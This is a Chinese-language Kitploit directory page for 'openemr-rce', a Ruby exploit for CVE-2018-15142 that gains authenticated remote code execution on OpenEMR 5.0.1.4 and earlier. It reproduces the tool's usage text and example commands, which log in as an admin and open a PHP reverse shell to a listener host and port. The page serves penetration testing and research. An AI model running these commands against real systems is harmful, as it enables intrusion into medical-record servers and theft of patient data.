Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/noraj/openemr-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubnoraj/openemr-rce

OpenEMR-RCE

OpenEMR <= 5.0.1 - (已认证)远程代码执行

查看仓库网站
8105年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OpenEMR RCE 漏洞利用 / PoC

OpenEMR <= 5.0.1.4 - (已认证) 远程代码执行

针对 CVE-2018-15142 的漏洞利用程序。

[EDB-49486] [PacketStorm] [WLB-2020080011]

用法

$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
  exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  exploit.rb -H | --help

Options:
  -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  -u <username>, --user <username>      Username of the admin
  -p <password>, --password <password>  Password of the admin
  -m <payload>, --payload <payload>     Metasploit PHP payload
  -h <host>, --lhost <host>             Reverse shell local host
  -t <port>, --lport <port>             Reverse shell local port
  --debug                               Display arguments
  -H, --help                            Show this screen

Examples:
  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

模式

  • Auto:你知道目标且已准备好监听器,剩下的交给漏洞利用程序处理
  • Semit-auto:与 Auto 相同,但你可以指定除默认 php/reverse_php 之外的其他 payload
  • Manual:你已经拥有自定义 PHP 反弹 shell,漏洞利用程序允许你指定它

要求

  • httpclient
  • docopt.rb
  • (可选) Metasploit Framework (msfvenom 用于在 auto 和 semi-auto 模式下生成反弹 shell)

BlackArch 示例:

pacman -S ruby-httpclient ruby-docopt metasploit

使用 gem 的示例:

gem install httpclient docopt

参考

这是对 EDB-ID-48515 的更好重写,并实现了 EDB-ID-45202 第 2 部分:

  • 使用参数(而不是硬编码值)
  • 允许自定义 PHP 反弹 shell,或使用 msfconsole 自动生成
  • 更简洁且更可定制
  • 使用 ruby 编写(python2 已弃用)

此漏洞利用程序已在 Ruby 2.7.1 上测试。

关于 EDB-ID-48515:

Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
下载工具